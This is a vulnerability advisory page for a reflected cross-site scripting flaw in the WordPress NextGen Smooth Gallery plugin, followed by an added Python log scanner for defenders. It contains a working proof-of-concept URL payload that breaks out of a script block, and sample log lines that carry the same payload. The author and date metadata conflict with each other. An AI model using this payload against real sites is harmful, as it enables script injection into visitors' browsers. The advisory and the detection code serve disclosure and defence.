CVE | Category | Price | Severity |
---|---|---|---|
CVE-2011-2938 | CWE-79 | Not specified | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Aliaksandr Hartsuyeu | High | Remote | 2017-11-01 |
-------------------------------------------
WordPress SmoothGallery - NextGen Gallery XSS
By SonnySpooks
-------------------------------------------

1. [About App]
-------------------------------------------
NextGen Gallery is a plugin used for Smooth gallery modulation and appearance on multiple sites.

-------------------------------------------
2. [Issue With It]
-------------------------------------------
The file nggSmoothFrame.php takes a parameter, textShowCarousel, whose value is reflected and parsed inside the <script> area of the page, so it is easily affected by arbitrary code.

-------------------------------------------
3. [Replication of attack]
-------------------------------------------
Example:

"site.com/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=0&textShowCarousel=</script><svg/onload=alert(/XSSPOSED/)>"

-------------------------------------------
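
Added example (not part of the original advisory, and not the plugin's code): a log check a defender can run to find requests to nggSmoothFrame.php whose textShowCarousel value contains characters that can break out of a <script> block. It assumes combined-format access logs; the sample entries, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line of a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TARGET_FILE = "nggsmoothframe.php"  # file named in the advisory (lower-cased)
PARAM = "textShowCarousel"          # parameter named in the advisory
# Characters that let a value leave a JavaScript string or the <script> element.
BREAKOUT_RE = re.compile(r"[<>\"'\\\r\n]")

# Constructed sample entries (documentation IP ranges), not real traffic.
PLUGIN = "/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php"
SAMPLE_LOG = [
    f'203.0.113.5 - - [01/Nov/2017:10:00:00 +0000] "GET {PLUGIN}?galleryID=3'
    '&textShowCarousel=Pictures HTTP/1.1" 200 5120',
    f'198.51.100.23 - - [01/Nov/2017:10:02:11 +0000] "GET {PLUGIN}?galleryID=0'
    '&textShowCarousel=%3C%2Fscript%3E%3Csvg%2Fonload%3Dalert(%2FXSSPOSED%2F)%3E'
    ' HTTP/1.1" 200 5301',
    f'198.51.100.23 - - [01/Nov/2017:10:02:40 +0000] "GET {PLUGIN}?galleryID=0'
    '&textShowCarousel=%253C%252Fscript%253E HTTP/1.1" 200 5290',
    '203.0.113.9 - - [01/Nov/2017:10:03:00 +0000] "GET /index.php?s=%3Cb%3E'
    ' HTTP/1.1" 200 812',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (line_number, decoded_value) for requests worth reviewing."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request line
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/" + TARGET_FILE):
            continue  # some other script; out of scope for this check
        # parse_qs decodes once; fully_decode handles double encoding.
        for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            value = fully_decode(raw)
            if BREAKOUT_RE.search(value):
                hits.append((number, value))
    return hits
```

A hit means the value could change how the script block is parsed, not that the request succeeded; quote characters can also appear in legitimate captions, so review each hit against the response and the installed plugin version.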
Copyright ©2024 Exploitalert.